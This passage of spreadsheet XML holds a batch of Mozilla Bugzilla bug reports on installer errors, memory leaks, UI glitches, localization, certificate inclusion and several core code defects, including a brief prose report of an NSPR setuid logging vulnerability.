thank you for your time.</t>
  </si>
  <si>
    <t>FIREFOX-325363</t>
  </si>
  <si>
    <t>Installed Firefox 1.5 on desktop but when Run was clicked a box came up that said unspecified error.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 SV1 .NET CLR 1.1.4322)
Build Identifier: http://www.mozilla.com/firefox/
1. I downloaded Firefox 1.5 onto my desktop. (We have dial-up so it took 40 min.) 
2. I clicked on the icon on my desktop: Firefox Setup 1.5.exe 
3. A box came up with this text: Open File - Security Warning - The publisher could not be verified. Are you sure you want to run this software?
4. I clicked Run
5. Then a small box came up that said 7-Zip at the top and Unspecified error below that. The only thing to click was OK which made the box disapper.
Reproducible: Always
Steps to Reproduce:
1. Download Firefox 1.5 onto desktop
2. Click on the icon on desktop: Firefox Setup 1.5.exe 
3. Box comes up with this text: Open File - Security Warning - The publisher could not be verified. Are you sure you want to run this software?
4. Click Run
5. Small box comes up: 7-Zip at the top and Unspecified error below that. Click OK - box disappers nothing else happens.
Actual Results:  
Nothing.
Expected Results:  
Enabled me to run and use Mozilla Firefox 1.5.exe
Wanted to install Firefox because in trying to access www.12DailyPro.com a possible virus caused the page I was trying to access to be blank with Done in the bottom left corner. This happened to another person also which led me to believe that there was a virus present and if I used Mozilla rather than Internet Explorer that would solve the problem.
Thank you very much for your help.
Lotus Wilkeron
lookingup@finestplanet.com</t>
  </si>
  <si>
    <t>lookingup</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-318632</t>
  </si>
  <si>
    <t>Add components for all missing locales</t>
  </si>
  <si>
    <t>It would be extremely handy to have components under Mozilla Localizations for all the locales that are supported in l10n CVS and have them default assigned to the appropriate locale person. Right now it seems that most bugs for locales that don't have components are going into Other.
Would this be possible? It would save a step and allow better organization of bugs.
Just my two cents. :)</t>
  </si>
  <si>
    <t>FIREFOX-529506</t>
  </si>
  <si>
    <t>Login Window not being shown Error is o.toLowerCase is not a function</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.2b2) Gecko/20091108 Firefox/3.6b2 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.2b2) Gecko/20091108 Firefox/3.6b2 (.NET CLR 3.5.30729)
POST https://test.picturepark.com/Webservice/ConfigurationService.svc/GetConfiguration
POST https://test.picturepark.com/Webservice/ConfigurationService.svc/GetConfiguration
200 OK
		257ms	ext-base...s?7.0.3.2 (line 7)
o.toLowerCase is not a function
anonymous(48563424)ext-all....s?7.0.3.2 (line 7)
anonymous()ext-all....s?7.0.3.2 (line 7)
anonymous(1 Object id=1 data=Object json=Object store=Object)ext-all....s?7.0.3.2 (line 7)
anonymous([Object id=2 data=Object json=Object store=Object Object id=4 data=Object json=Object store=Object Object id=1 data=Object json=Object store=Object 1 more... 0=Object 1=Object 2=Object 3=Object])ext-all....s?7.0.3.2 (line 7)
anonymous(Object success=true records=[4] totalRecords=4 Object params=Object true)ext-all....s?7.0.3.2 (line 7)
anonymous(read Object name=c Object Object meta=Object jsonData=[4] ef=[12] function() Object data=Object baseParams=Object removed=[0] Object params=Object)ext-all....s?7.0.3.2 (line 7)
anonymous(read Object name=b Object Object meta=Object jsonData=[4] ef=[12] function() Object data=Object baseParams=Object removed=[0] Object params=Object)ext-all....s?7.0.3.2 (line 7)
anonymous(read Object name=a Object params=Object)ext-all....s?7.0.3.2 (line 7)
anonymous(Object params=Object)ext-all....s?7.0.3.2 (line 7)
anonymous(Object Configuration=Object User=Object UserRights=Object)Picturep...d?7.0.3.2 (line 325)
b(Object tId=0 status=200 statusText=OK)ext-all....s?7.0.3.2 (line 7)
f(Object conn=XMLHttpRequest tId=0 Object scope=Object argument=Object timeout=1200000 Object name=r Object name=q)ext-base...s?7.0.3.2 (line 7)
anonymous()ext-base...s?7.0.3.2 (line 7)
[Break on this error] Ext.DomHelper=function(){var s=nullj=/^...b.stopEvent()this.completeEdit()}}}})\next-all....s?7.0.3.2 (line 7)
Reproducible: Always
Steps to Reproduce:
1.go to www.picturepark.com/test
2.No login screen appears. 
Actual Results:  
Blank page - no login window.
Expected Results:  
Login window 
We do not have an issue with this in current Firefox version only in Beta 3.6b1 and 2.</t>
  </si>
  <si>
    <t>n.keil</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-487459</t>
  </si>
  <si>
    <t>Fix selection going across from editor into the page itself in Safari</t>
  </si>
  <si>
    <t>Created attachment 371698
Safari 4 Screenshot showing glitch
If you start a selection and then move up past the editor it manages to also select the objects around in the page. We need to see if we can disable this.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-268097</t>
  </si>
  <si>
    <t>sv-SE / Swedish</t>
  </si>
  <si>
    <t>Last-minute changes to sv-SE</t>
  </si>
  <si>
    <t>There have been some last-minute changes to en-US so we need to do the same for
sv-SE.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-224423</t>
  </si>
  <si>
    <t>TondelaOnline.com - marquee with height='0'</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4.1) Gecko/20031008
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4.1) Gecko/20031008
a html function in fault...
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Expected Results:  
TEXT
HERE -&gt; things like that should work in the future...</t>
  </si>
  <si>
    <t>Kmos</t>
  </si>
  <si>
    <t>CORE-514624</t>
  </si>
  <si>
    <t>UTF8 to Unicode conversion of SSE2 optimization for x86_64 platform</t>
  </si>
  <si>
    <t>Although bug 506430 is landed this is for x86 only.  We should enable it for x86_64 (x86_64 supports SSE2 as default!)</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-160925</t>
  </si>
  <si>
    <t>Contents of location bar should not wrap</t>
  </si>
  <si>
    <t>On long URLs with hyphens in (or other characters that can cause line breaks)
the URL bar is wrapping the text so I only see half the URL. Example (AOL
internal):
All I see of this is http://finweb01.office.aol.com:8080/cgi-.
We have to get the NSTextView to not wrap somehow.</t>
  </si>
  <si>
    <t>FIREFOX-350424</t>
  </si>
  <si>
    <t>Search is broken</t>
  </si>
  <si>
    <t>Regression between 1.9a1_2006082710 and 1.9a1_2006082716.
http://bonsai.mozilla.org/cvsquery.cgi?module=PhoenixTinderbox&amp;date=explicit&amp;mindate=2006-08-27+09%3A00&amp;maxdate=2006-08-27+17%3A00</t>
  </si>
  <si>
    <t>CORE-296967</t>
  </si>
  <si>
    <t>[FIX]Could XPCNativeWrapper call the classinfo helpers?</t>
  </si>
  <si>
    <t>This came up in a conversation yesterday.  Would it be possible for
XPCNativeWrapper to call the Get/Set/Resolve classinfo hooks as needed and
remain secure?  That is do whatever the current native wrapper class hooks do
w.r.t calling into the classinfo.
That would remove pretty much all the items at
I think as well as whatever other things might pop up in the future so I think
it would be worth it if it wouldn't take too much code wouldn't be too slow
and most of all could be done securely.</t>
  </si>
  <si>
    <t>CORE-321379</t>
  </si>
  <si>
    <t>Crash using a closed stream [@ nsConverterOutputStream::Close][@ nsConverterOutputStream::Write]</t>
  </si>
  <si>
    <t>I wasn't trying to crash it but it did when i forgot i had closed the stream.</t>
  </si>
  <si>
    <t>SEAMONKEY-41123</t>
  </si>
  <si>
    <t>Tooltips needed for lock icon</t>
  </si>
  <si>
    <t>There are no tooltips for the navigation buttons personal toolbar or My 
Sidebar.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-343059</t>
  </si>
  <si>
    <t>In  Warning: assignment to undeclared variable linkTextURL</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Win98 en-US rv:1.8.1a3) Gecko/20060628 SeaMonkey/1.1a] (nightly) (W98SE)
When I click on a link in a newsgroup I can get the following warnings.
[
Warning: assignment to undeclared variable hrefURL
Source File: chrome://messenger/content/phishingDetector.js
Line: 109
Warning: assignment to undeclared variable linkTextURL
Source File: chrome://messenger/content/phishingDetector.js
Line: 150
]</t>
  </si>
  <si>
    <t>NSS-515470</t>
  </si>
  <si>
    <t>Add VeriSign Universal Root Certification Authority root certificate to NSS</t>
  </si>
  <si>
    <t>This bug requests inclusion in the NSS root certificate store of the following certificate owned by VeriSign.
Friendly name: 
VeriSign Universal Root Certification Authority
Certificate location: 
https://bugzilla.mozilla.org/attachment.cgi?id=368998
 (will also attach to this bug)
SHA1 Fingerprint: 
36:79:CA:35:66:87:72:30:4D:30:A5:FB:87:3B:0F:A7:7B:B7:0D:54
Trust flags: web sites email code signing
Test URL: https://ptnr-verisign256.bbtest.net
This CA has been assessed in accordance with the Mozilla project guidelines
and the root certificates have been approved for inclusion in bug 484901.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate(s) have been attached. They must also
specify what OS they would like to use to perform the verification below.
2) A Mozilla representative creates a test build of NSS with the new
certificate(s) and attaches nssckbi.dll to this bug. A representative of the
CA must download this drop it into a copy of Firefox and/or Thunderbird on the
OS in question and confirm (by adding a comment here) that the certificate(s)
have been correctly imported and that websites work correctly.
3) The Mozilla representative checks the certificate(s) into the NSS store and
marks the bug RESOLVED FIXED.
4) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under the
control of the release drivers for those products.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-464539</t>
  </si>
  <si>
    <t>[nl] Backport about:rights to 3.0.5</t>
  </si>
  <si>
    <t>You're receiving this email because your about:rights has not yet been translated.  Please let us know in this bug if you plan to keep the about:rights section untranslated.  We will need to hear if you intend to translate these strings or if you want your locale to contain the en-US strings for about:rights.  
When/if you have finished your translation please create a patch for about:rights and ask for approval to land it for FF 3.0.5.
You can find the updated release schedule for Firefox 3.0.5 here:
https://wiki.mozilla.org/Releases/Firefox_3.0.5#Schedule
It obviously benefits us if you can get your changes in as soon as possible but we know how busy you are so please let us know if/how we can help.</t>
  </si>
  <si>
    <t>sethb</t>
  </si>
  <si>
    <t>TOOLKIT-335143</t>
  </si>
  <si>
    <t>Target ABI may not contain underscores</t>
  </si>
  <si>
    <t>The current nsExtensionManager splits the targetPlatform string by underscores ('_') without limiting the number of items. This way the string Linux_x86_64-gcc will be split into ['Linux' 'x86' '64-gcc3'] instead of ['Linux' 'x86_64-gcc3']. This obviously causes the x86_64-gcc3 ABI (or any ABI with an underscore) to never match.</t>
  </si>
  <si>
    <t>CORE-308292</t>
  </si>
  <si>
    <t>listbox.insertItemAt throws exception</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
listbox.insertItemAt(0) throws exception:
Error: [Exception... Component returned failure code: 0x80004005
(NS_ERROR_FAILURE) [nsIListBoxObject.getItemAtIndex]  nsresult: 0x80004005
(NS_ERROR_FAILURE)  location: JS frame ::
chrome://global/content/bindings/listbox.xml :: getItemAtIndex :: line 481 
data: no]
Source File: chrome://global/content/bindings/listbox.xml
Line: 481
It can be fixed as:
   try{ return this.listBoxObject.getItemAtIndex(index) }
   catch(e){ return null }
I guess if getItemAtIndex() of listbox will not fire exception on invalid index
then it will be at one's ease. If you aren't agree with such approach then you
can change insertItemAtIndex() by the next way:
var XULNS = http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
var item = document.createElementNS(XULNS listitem)
item.setAttribute(label label)
item.setAttribute(value value)
// begin original code
var before = this.getItemAtIndex(index)
//end
// begin proposed code
var before
try{ before=this.getItemAtIndex(index) }
catch(e){}
// end
if (before)
   this.insertBefore(item before)
else
   this.appendChild(item)
return item
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-419093</t>
  </si>
  <si>
    <t>property performance still worse in-browser on a few tests</t>
  </si>
  <si>
    <t>- bitwise-and
- math-partial-sums
- string-validate-input</t>
  </si>
  <si>
    <t>CORE-819825</t>
  </si>
  <si>
    <t>WebRTC</t>
  </si>
  <si>
    <t>some ICE/STUN negotiations hang or crash on Android in mbslen()</t>
  </si>
  <si>
    <t>Created attachment 690253
WIP patch 1: abort the function rather than trying to handle a null return from setlocale()
After apply the build patches for Android in the dependency tree for bug 750869 the ICE unittest hangs or crashes in mbslen.  The problem is that setlocale() on Android returns null.
The calling code actually isn't really caring about this function excitingly.  Here's a patch that makes things run further but it would be good to verify that's impossible/hard to get UTF8 before we just punt.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-384490</t>
  </si>
  <si>
    <t>Remove nsHashTable from mailnews</t>
  </si>
  <si>
    <t>It looks like nsHashTable.h is not supported by frozen linkage (it includes nsString.h).
We'll need to convert the callers in mailnews to something else like an implementation of nsTHashTable or one of its derived classes. It looks like there are 16 implementations of nsHashTable in mailnews:
http://mxr.mozilla.org/seamonkey/search?string=nsHashTable.h
Maybe prasad and I can work on this while we wait for biesi's code review for the nsINetUtil escape patch.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-210985</t>
  </si>
  <si>
    <t>Mail &amp; News not closing summary files for newsgroups</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030624
Mozilla loads Usenet group indexfiles (.msf) to memory when browsing group.
Naturally memory load increases amount of how large index is. Unfortunately
Mozilla 'forgets' to unload group indexfile when moving to next group that
results huge memory consumption especially when reading large groups.
In worst case one group indexfile takes ~10MB of diskspace resulting 100MB
memory usage after reading 10 groups. Memory usage returns to normal level only
after *ALL* mozilla windows have been closed. 
As you can see in screenshot mozilla takes ~120MB of memory and ~120MB of VM
after ~10 groups none of them are binarygroups. This bug leads to severe
overall system performance slowdown even on high-end machines and could crash
low-end systems.
Reproducible: Always
Steps to Reproduce:
This bug is new to Mozilla 1.4 RC2.</t>
  </si>
  <si>
    <t>archonon</t>
  </si>
  <si>
    <t>CORE-652305</t>
  </si>
  <si>
    <t>TI+JM: Kraken crypto-aes regression</t>
  </si>
  <si>
    <t>Created attachment 527916
Reduced
$ ./js -n -m test.js
test.js:19: Error: Assertion failed: got -658505728 expected 1667457891</t>
  </si>
  <si>
    <t>BUGZILLA-286625</t>
  </si>
  <si>
    <t>./collectstats.pl --regenerate is enormously slow</t>
  </si>
  <si>
    <t>Doing most anything with the bugs_activity table is interminably slow because 
the existing indices don't cover the added/removed fields which are what 
really need help the most.
For example: running 'collectstats.pl --regenerate' on my local database with 
these indices took under 5 hours before putting the indices on I let it run 
for 35 hours before I stopped it and it did not yet look to be more than 
halfway done.
Patch to follow.</t>
  </si>
  <si>
    <t>NSS-183146</t>
  </si>
  <si>
    <t>buffer length bug in NSC_EncryptUpdate</t>
  </si>
  <si>
    <t>In netscape.public.mozilla.crypto pingzhenyu@ideabank.net.cn reported 
an apparent bug in NSC_EncryptUpdate.  The code now reads (near line 757)
    /* encrypt the current padded data */
    rv = (*context-&gt;update)(context-&gt;cipherInfopEncryptedPart 
    if (rv != SECSuccess) return CKR_DEVICE_ERROR
    pEncryptedPart += padoutlen
    maxout -= padoutlen
pingzhenyu suggests that the third argument to context-&gt;update should be
&amp;padoutlen rather than &amp;outlen since the value of padoutlen not outlen
is subsequently added to pEncryptedPart and subtracted from maxout.
But in looking at this code further I think this problem is only the tip
of the iceberg.  The block of code that begins near line 740 with the test
    /* do padding */
    if (context-&gt;doPad) {
which handles saving of partial blocks from one update call to the next
clearly needs to be done for ALL block ciphers.  But it is presently being
done only for those block cipher mechanisms that feature PKCS#7 padding.  
For example context-&gt;doPad is set to TRUE for CKM_DES_CBC_PAD but not
for CKM_DES_CBC yet the handling of partial blocks is needed for both.
I think softoken has been getting away with this because the higher layers
tend not to do encryption updates with partial blocks.  SSL/TLS for example
does its own padding for partial blocks and so always calls update with 
full blocks.  Perhaps the PKCS#7 (SMIME) code behaves similarly.  But the
token's behavior appears to be wrong for partial block updates on block 
ciphers.</t>
  </si>
  <si>
    <t>THUNDERBIRD-259215</t>
  </si>
  <si>
    <t>6 accts 1 window w/s 29.8MB disk 40.9MB total 70.7MB -- unacceptable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
minimizing drops to med 4-figures w/s restoring shoots back up to summary
condition and some times worse
Reproducible: Always
Steps to Reproduce:
1. use tb
2.
3.
Actual Results:  
as explained
Expected Results:  
this is an unbelievable waste of mem usage for an email client.
this is a marketing/programming failure across mozilla ff/tb
nobody is willing to put up with a ff/tb env that takes 60 to &gt;100 MB of ram and
70 to &gt;100 MB disk to just do minimal service.
morover ff/tb frequently suffer mem leaks that do not crash but slowly
deteriorate the env causing scn r/w problems uri load errors crashing of other
pgms et cetera.
restoring the sys viability requires a warm boot to completely solve the problems.</t>
  </si>
  <si>
    <t>johann</t>
  </si>
  <si>
    <t>NSPR-351470</t>
  </si>
  <si>
    <t>setuid root programs linked with NSPR allow elevation of privilege (CVE-2006-4842)</t>
  </si>
  <si>
    <t>I believe this affects all Unix/Linux systems but there is no bugzilla 
platform/OS target that covers all those so I have chosen All/All.
NSPR logging is controlled with a couple of environment variables 
one to enable it and a second to control the name of the log file.
This appears to all work in optimized (non-debug) builds.  
So if any setuid root program is linked with NSPR any user can clobber
any file on the system (any root writable file) by setting NSPR's 
environment variables to log to that file and then running a setuid root
program linked with NSPR.</t>
  </si>
  <si>
    <t>CORE-208271</t>
  </si>
  <si>
    <t>Remove accessproxy component from build but keep in tree</t>
  </si>
  <si>
    <t>I'm planning to start updating the accessproxy component again soon because
there is s a screen reader vendor who wants to start using it.
However they will be installing the component as part of their own software in
their own installer.
I want to remove this from the normal build because it is really a special
component that needs to be built on an individual basis.</t>
  </si>
  <si>
    <t>TESTOPIA-360100</t>
  </si>
  <si>
    <t>Cloning</t>
  </si>
  <si>
    <t>Cloning a test case with copy document also clones the entire document history</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20061010 Firefox/2.0
Cloning a test case and including the option 'copy document' causes the entire document history of the cloned from test case to be passed on to the clone.
Reproducible: Always
Steps to Reproduce:
Steps to Recreate:
1. Create a test case with a few version on it. (i.e 5)
2. Clone the test case as a copy. Make sure copy document is checked.
Actual Results:  
The new test case has the same document history as the original.
When cloning a test case the entire history of the test case comes with it.
Expected Results:  
I expected that the copy document feature would copy the most recent document version only.
If there is some reason why it makes sense to also clone the history of a test case when creating a new copy I would expect this as an option otherwise I would expect the copy to take only the most recent document since the history actually has nothing to do with the test case itself.</t>
  </si>
  <si>
    <t>CORE-394542</t>
  </si>
  <si>
    <t>we leak the blink timer and its timer in a cycle</t>
  </si>
  <si>
    <t>Whenever we use the blink timer we leak the nsBlinkTimer and its nsTimerImpl in a cycle.  Right now we create a new nsTimerImpl each time the blink timer count goes above zero (nsBlinkTimer::Start) but we keep the same nsBlinkTimer around (since its mTimer owns it until we hit nsBlinkTimer::Start again).  Fixing the leak means they should either both stay around or both go away.  Making them both go away is a one-line patch so I'll do that.
Note that fixing bug 330128 would also fix this.</t>
  </si>
  <si>
    <t>SEAMONKEY-526171</t>
  </si>
  <si>
    <t>Rename all instances of menu_Edit_Popup to menu_EditPopup to match Aviary apps.</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #518865 +++
http://mxr.mozilla.org/comm-central/source/calendar/lightning/content/messenger-overlay-sidebar.xul#125
Thunderbird uses menu_EditPopup while SeaMonkey uses menu_Edit_Popup</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-364498</t>
  </si>
  <si>
    <t>New planet config.ini to be pushed</t>
  </si>
  <si>
    <t>Added Matthew Willis.</t>
  </si>
  <si>
    <t>WEBSITES-520772</t>
  </si>
  <si>
    <t>Labs blog individual post pages are blank</t>
  </si>
  <si>
    <t>Examples:
* http://labs.mozilla.com/testpilot/2009/10/01/the-first-test-pilot-data-visualizations/
* http://labs.mozilla.com/weave/2009/09/30/weave-0-7-released/
* http://labs.mozilla.com/ubiquity/2009/08/17/welcome-to-the-new-ubiquity-weblog/
The main Labs blog appears to be ok so it might just be the project blogs.  Not sure if something in the theme was changed.</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-802203</t>
  </si>
  <si>
    <t>Set up a script to mirror prod to staging</t>
  </si>
  <si>
    <t>It's difficult to do proper testing on the staging server without real content. We should set up a script that periodically mirrors prod to staging.
For security reasons this script should scrub the contents by removing personal information such as email addresses and passwords (with the possible exception of leaving alone the accounts used by testers and devs this is something to sort out).</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-441858</t>
  </si>
  <si>
    <t>SUMO sending all queries for 'sessions' table to the master</t>
  </si>
  <si>
    <t>The SUMO site is sending all SELECT queries on the 'sessions' table to the master and not using the slaves.  The slaves feel underutilized.
This is leading to the master paging IT 3-5 times a day because it is bogging down with these queries.  This is a large table 1.7G and the DB is not able to efficiently cache it in memory.  Because of that when enough of these queries come in the disks hit 100% utilization and the server performance bogs down for a few minutes.
Would be great to get these queries split out to the slaves if we can.  Thanks!</t>
  </si>
  <si>
    <t>CORE-197121</t>
  </si>
  <si>
    <t>allow for listener to modify contents during copy/drag</t>
  </si>
  <si>
    <t>The editor should allow for a listener to modify the contents after copy.
Related to bug 192567.</t>
  </si>
  <si>
    <t>carosendahl</t>
  </si>
  <si>
    <t>THUNDERBIRD-395544</t>
  </si>
  <si>
    <t>Remove unused strings in preferences.properties</t>
  </si>
  <si>
    <t>Created attachment 280217
Fix
We'll probably lose a few more if/when we port bug 377784 (that being where Gavin noticed that pluginHelperNoneAvailable was unused) but this at least gives us a clear slate for that.
The big wad of password strings went to toolkit in bug 285158 as did downloadHelperNoneSelected (it's only used by #fileField).
pluginHelperNoneAvailable we haven't ever used from the first bug 284144 landing
Despite the #### Fonts heading the two language code format strings are used in the UI for setting intl.accept_languages (Advanced - General - choose languages in Firefox never been in Thunderbird)
fontScalingResolutionFormat went away in bug 326329</t>
  </si>
  <si>
    <t>CORE-326732</t>
  </si>
  <si>
    <t>disabled submit inputs have text selection (I-beam) cursor</t>
  </si>
  <si>
    <t>Disabled submit inputs have the text cursor instead of an arrow like non-disabled ones. Testcase in URL. 
Does not occur on FF1.5 Windows so I'm assuming it's a regression though it could conceivably be Linux only...</t>
  </si>
  <si>
    <t>aguertin+bugzilla</t>
  </si>
  <si>
    <t>FIREFOX-299700</t>
  </si>
  <si>
    <t>Automatically check for updates for my extensions and themes is unchecked after checking manually</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050704 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050704 Firefox/1.0+
Whenever I check for updates to my extensions and themes manually the checkbox
to autocheck for updates to my extensions and themes is automatically unchecked.
 Even though I sometimes like to check for updates manually doesn't mean I would
like to check manually _all_ the time....
Zip build
Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050704
Firefox/1.0+ ID:2005070405
Reproducible: Always
Steps to Reproduce:
1. Open up DPa1
2. Go to Tools -&gt; Options -&gt; Advanced -&gt; Update
3. Check the box labeled My Extensions and Themes
4. Click the Check Now... button under the aforementioned checkbox
5. Click the Finish or Cancel buttons to exit the update window (doesn't
matter if it's done checking or not)
6. Notice that now the My Extensions and Themes checkbox is unchecked.
Expected Results:  
The autoupdate extensions and themes checkbox should have remained checked (FF
1.0.4 does this perfectly).</t>
  </si>
  <si>
    <t>BlindWolf8</t>
  </si>
  <si>
    <t>CORE-334716</t>
  </si>
  <si>
    <t>Ineffective allocation check in nsParserService::CreateEntry (nsParserService.cpp)</t>
  </si>
  <si>
    <t>This was found through a coverity scan of the mozilla source. |nsParserService::CreateEntry| contains the following code:
259   *aEntry = new nsObserverEntry(aTopic)
260 
261   if (!aEntry) {
262     return NS_ERROR_OUT_OF_MEMORY
263   }
Shirley line 261 should be testing |*aEntry|.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-500215</t>
  </si>
  <si>
    <t>Update mozilla-1.9.1 branch description (3.1-&gt;3.5)</t>
  </si>
  <si>
    <t>http://hg.mozilla.org/releases
Firefox 3.1 -&gt; Firefox 3.5</t>
  </si>
  <si>
    <t>rockmfr</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-186997</t>
  </si>
  <si>
    <t xml:space="preserve">Microsoft style popup does not show in pages with </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.2.1) Gecko/20021130
These things are like Tooltips for web pages.
Apparantly yet another 'gotcha' from our friend Billy Gates.
They don't show in Mozilla but if you Ctrl-C copy the text surrounding it it gets copied.
Reproducible: Always
Steps to Reproduce:
1.Go to
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/prodtechnol/windowsnetserver/proddocs/server/fsutil_volume.asp
2.About 1/4 of the way down the scrollable frame on the right look for underlined text globally unique identifier (GUID).  It looks like a link.
3.In IE6 it pops up a window that says A 16-byte value generated from the unique identifier on a device the current date and time and a sequence number. A GUID is used to identify a particular device or component.
Actual Results:  
In Mozilla 1.2.1 you don't see the popup
Expected Results:  
Sigh.  Chase Bill Gates again and figure out how to show those  tags.
If Bill knows Mozilla won't show these he'll lure users of Front Page etc into using them more and more!</t>
  </si>
  <si>
    <t>dirtyoldm</t>
  </si>
  <si>
    <t>CORE-489178</t>
  </si>
  <si>
    <t>Script tag  causes style color to change to surrounding font color</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
The presence or absence of a script tag should never influence a color on the page yet does.
Should always be red
If the  tag in the above is commented out then the text color changes to red. If the script tag is present then the text color is that of the surrounding  tag namely green. Tested on Firefox 3.0.8 in normal and in safe mode. Also tested on SeaMonkey 1.1.11 and it does the same.
Reproducible: Always
Steps to Reproduce:
1. Comment out the script tag
2. Put back the script tag
Actual Results:  
No script tag  - text color red
With script tag - text color green
Expected Results:  
No script tag  - text color red
With script tag - text color red
Script tag shouldn't make a difference.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-503616</t>
  </si>
  <si>
    <t>Add a monitor for indexing cron job on SUMO prod</t>
  </si>
  <si>
    <t>We need to make sure this job runs and works when it runs and somebody gets paged if it fails.  See https://bugzilla.mozilla.org/show_bug.cgi?id=485329#c41 and subsequent discussion in that bug.</t>
  </si>
  <si>
    <t>CORE-418650</t>
  </si>
  <si>
    <t>disable autodialer in windows mobile</t>
  </si>
  <si>
    <t>Created attachment 304517
patch v.1
Build bustage fix.</t>
  </si>
  <si>
    <t>CORE-44149</t>
  </si>
  <si>
    <t>improperly parented modal dialog in nsWalletService</t>
  </si>
  <si>
    <t>nsNetSupportDialog should only be used as a backup plan if no other nsIPrompt 
interface is available. It has been used in dozens of places because of its 
seductive convenience. But it's flawed creating modal windows that don't behave 
correctly the cause of various blanket bugs like 25684 and 39439 (both currently 
considered nsbeta2+).
  This problem can only be fixed by trying much harder to find a proper window to 
be the modal dialog's parent. nsNetSupportDialog should be relegated to providing 
backup when herculean efforts to locate the actual parent window fail for some 
reason.
  As an example the cookie service has been taught to use a proper parent window 
for its dialog by laboriously storing a reference to that window's nsIPrompt in 
nsHTTPChannel from which it can be extracted and passed around while processing 
notification events punting to nsNetSupportDialog only when no other choice is 
available. That same sort of thing needs to be done in many more places.
  One such place is nsWalletlibService::OnEndDocumentLoad. I plan to take this 
one rather than dump it on someone else since it looks rather easily fixable.
  Happy recipients of this bug would spread the happiness most widely if they 
would start using a good nsIPrompt window. The modal windows don't behave 
nicely bugs are being made dependent on this bug and its siblings and will 
eventually be closed as as fixed as they're going to get once these have all 
been considered.</t>
  </si>
  <si>
    <t>CORE-953044</t>
  </si>
  <si>
    <t>Calling setInputMethodActive(false)  before mozbrowser content loaded  always fails</t>
  </si>
  <si>
    <t>Firefox OS input method apps will be loaded within mozbrowser iframes. To deactivate the iframe of an input method app we should call setInputMethodActive(false) on the iframe.
By default the iframe is deactivated before loading. So calling setInputMethodActive(false) before input method loading should always succeed. But a typo in bug 944397 makes it always fail.</t>
  </si>
  <si>
    <t>xyuan</t>
  </si>
  <si>
    <t>CALENDAR-506322</t>
  </si>
  <si>
    <t>Today pane collapse/expand buttons should always react to first click</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 et rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Build Identifier: 
After focusing on an event in today pane collapse button needs to clicks to work.
Reproducible: Always
Steps to Reproduce:
1. Create an event on tomorrow
2. Make sure tomorrow section is expanded
3. Click on the event in today pane and hit delete
4. Click on collapse button
Actual Results:  
It won't collapse.
Expected Results:  
It should collapse.
A second click on collapse button makes it collapse.</t>
  </si>
  <si>
    <t>merikes.lists</t>
  </si>
